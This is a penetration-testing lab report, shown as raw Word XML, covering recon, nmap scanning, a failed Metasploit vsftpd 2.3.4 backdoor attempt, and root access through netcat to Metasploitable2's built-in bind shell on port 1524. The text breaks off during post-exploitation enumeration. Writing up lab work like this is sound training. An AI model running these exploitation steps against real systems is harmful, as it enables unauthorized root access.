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0BDE2" w14:textId="2C5FC16E" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> Metasploitable2 — 192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker:</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> Kali Linux — 192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phases:</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> Recon → Scanning → Exploitation → Post-Exploitation → Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> Lab (authorized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> VM only). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B112DC4" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:pict w14:anchorId="2AD1B16A">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15878D" w14:textId="708C59FF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 xml:space="preserve">1. Reconnaissance (RECON) — </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE13C5" w14:textId="39E9CE5C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Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47496DF8" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>Recon = collect basic connectivity and network information to build an inventory and map the attack surface. This is low-impact, safe information gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C913E" w14:textId="599E75F6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Commands (on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682CE2AB" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>TARGET=192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D00B096" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>ping -c 3 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8324A3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netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -r 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48215941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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>-scan --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>localnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4269FCDD" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> a          # to view Kali IPs (used 192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716737D" w14:textId="6A1D28FC" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="0039289C" w:rsidP="001059B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="001059B3" w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33596E02" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>ping response: target alive (0% packet loss, low latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE1646" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> a on Kali: host-only interface eth0 shows 192.168.56.102 (this is LHOST for reverse shells).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B094336" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>-scan confirmed hosts on the 192.168.56.0/24 host-only network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6448E8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Evidence to include in report (screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DC166" w14:textId="3315EC26" w:rsidR="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>screenshots/01_recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6F8B4" w14:textId="14BECB8A" w:rsidR="0039289C" w:rsidRDefault="0039289C" w:rsidP="0039289C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3303AA2D" wp14:editId="74C893CC">
            <wp:extent cx="5731510" cy="3444240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="6896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D408" w14:textId="77777777" w:rsidR="0039289C" w:rsidRPr="001059B3" w:rsidRDefault="0039289C" w:rsidP="0039289C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01014D16" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:pict w14:anchorId="498FED06">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6EF1B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2. Scanning — ports, services, versions (completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F9570" w14:textId="72E5E463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 xml:space="preserve">Theory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F549242" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>Scanning discovers open ports and service versions to identify vulnerable software and plan exploitation. Start non-intrusively then escalate scans if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BE8BF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Commands run (on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9CD143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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114C411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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> --top-ports 100 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B29A04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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> 192.168.56.101         # optional, full port sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB5D1F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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> --script vuln 192.168.56.101   # non-intrusive NSE checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC06E03" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>curl -I http://192.168.56.101            # HTTP headers if web present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29AE3A" w14:textId="164B7F06" w:rsidR="001059B3" w:rsidRDefault="0039289C" w:rsidP="001059B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ScreenShots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73C7BFD6" w14:textId="6E690D5B" w:rsidR="0039289C" w:rsidRDefault="0039289C" w:rsidP="001059B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6965A947" wp14:editId="66C672E9">
            <wp:extent cx="5391586" cy="4011732"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1911239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79" cy="402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684B" w14:textId="77777777" w:rsidR="0039289C" w:rsidRDefault="0039289C" w:rsidP="001059B3"/>
    <w:p w14:paraId="5B6E5FF4" w14:textId="04479E30" w:rsidR="0039289C" w:rsidRPr="001059B3" w:rsidRDefault="0039289C" w:rsidP="001059B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09ACE885" wp14:editId="165F0C6D">
            <wp:extent cx="5339973" cy="4165013"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="665451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507" cy="41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5EC6" w14:textId="0196BD15" w:rsidR="0039289C" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3184DDE4">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="699BE832" w14:textId="51177398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3. Exploitation — (completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27C459" w14:textId="0C3376B9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 xml:space="preserve">Theory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A43951" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>Exploitation means using a known vulnerability to gain code execution or shell access on the target. Only performed in authorized lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3787A1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Methods attempted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B15F7" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor (Metasploit)</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> — attempted via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> using exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>/ftp/vsftpd_234_backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06665C7B" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> printed banner from FTP but </w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no session</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> was created in repeated tries. This is normal with some targets/payloads or timing/compatibility differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6938E" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind shell on TCP 1524</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> — direct connect (success). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> ships with a listening bind shell on port 1524 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>-managed). This is a textbook easy win on this lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51878341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Exact commands (on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C33831" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> attempt (for record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F9901" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AAD6FBC" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AA47E39" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B4585" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>set RHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6DFF9" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>set VERBOSE true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB3970" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D73955" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t># output: Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF3BD5" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3"/>
    <w:p w14:paraId="5F673EEE" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t># Successful exploit (bind shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E62786" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -v 192.168.56.101 1524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16870B36" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t># inside shell (on target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5CDB0" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2070C62F" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FCC79" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903F7CD" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:lastRenderedPageBreak/>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08465602" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E38BC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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B34C00" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> connected to 192.168.56.101:1524 and dropped into a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637795AF" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> → root; id → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>=0(root) so full root access obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB633CF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Evidence (screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE9937" w14:textId="66334CD4" w:rsidR="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>screenshots/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F1DF3" w14:textId="045F9F8D" w:rsidR="0039289C" w:rsidRPr="001059B3" w:rsidRDefault="0039289C" w:rsidP="001059B3">
      <w:pPr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91DBACD" wp14:editId="0CD09BF1">
            <wp:extent cx="5731510" cy="4027805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3331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A720" w14:textId="17C551D5" w:rsidR="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>screenshots/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538D97C" w14:textId="2394F7FF" w:rsidR="0039289C" w:rsidRPr="001059B3" w:rsidRDefault="0039289C" w:rsidP="001059B3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41D862CE" wp14:editId="1F3FFC8E">
            <wp:extent cx="5731510" cy="3469640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="769696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4FCA" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:pict w14:anchorId="51413E15">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1D810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4. Post-Exploitation — enumeration &amp; impact (completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFADC4A" w14:textId="5A20B19F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 xml:space="preserve">Theory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1F419" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>Post-exploitation = enumerate system to measure impact and gather evidence. Avoid destructive actions; collect read-only info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E4E87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Commands run (on target shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF77D03" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6083D27A" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E6BDC" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
